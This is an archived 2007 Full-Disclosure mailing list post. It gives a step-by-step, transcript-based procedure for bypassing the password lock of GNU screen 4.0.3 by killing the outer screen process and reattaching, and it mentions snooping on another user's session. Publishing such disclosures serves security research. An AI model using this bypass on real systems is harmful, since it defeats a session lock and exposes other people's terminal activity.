lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 6 Jun 2007 20:33:08 +0930
From: Sûnnet Beskerming <info@...kerming.com>
To: full-disclosure@...ts.grok.org.uk
Cc: Lolek of TK53 <lolek1337@...glemail.com>
Subject: screen 4.0.3 local Authentication Bypass -
	Working on multiple systems

After fiddling around with different signal codes and looking at the  
process shown by Paul, it looks like we can replicate this bypass on  
other systems now.  Tested and working on OS X 10.4.9 (screen  
4.00.03).  By following the slightly modified procedure, it should be  
repeatable across all systems.

~user(bash) $ screen
[system spawns two new pid, both for screen, and then a third pid for  
bash]
Activity Monitor now shows (in hierarchy mode)
pid 4965 Terminal
   \ pid 5111 login
     \ pid 5112 bash
       \ pid 5171 screen
         \ pid 5172 screen
           \ pid 5174 bash

~user(screen) $ echo Once the process is killed, I should not reappear.
Once the process is killed, I should not reappear.
~user(screen) $ ^a+x
Key: [1234]
Again: [1234]
Screen used by User <user>.
Password:

At this stage we now need to kill the right process.  On OS X, screen  
ignores the SIGINT sent by ^c, so we need to send it a SIGKILL.   
Using your favourite process killer, kill the outer screen pid  
(5171).  If you vary the process, such as:
	SIGKILL pid 5174 or 5172 - It will appear to not do anything, but  
when the password is re-entered it will return an error that it can't  
connect to session 5172.ttyp1.user and will terminate 5172 at this  
time.  Occasionally, it will not kill the parent process, or will  
refuse the legitimate password, but normally it will terminate.   
Running screen -r will identify one or more screens that could be  
dead, but not able to access (then run screen -wipe to remove them  
completely).

Password:Killed
~user(bash) $ screen -r
[automatically loads the following]

~user(screen) $ echo Once the process is killed, I should not reappear.
Once the process is killed, I should not reappear.
~user(screen) $

The system has spawned a completely new pid for screen, and has only  
loaded a single instance of it.  If the user now locks the screen it  
will ask for the password all over again - it has forgotten the  
original setting.  If you are going to use it to poke around  
someone's command history or screen use, then be aware of this result  
(then again, if you knew the password in the beginning, why bother  
with this process).

Have at it.

Carl

Sûnnet Beskerming Pty. Ltd.
Adelaide, Australia
http://www.beskerming.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ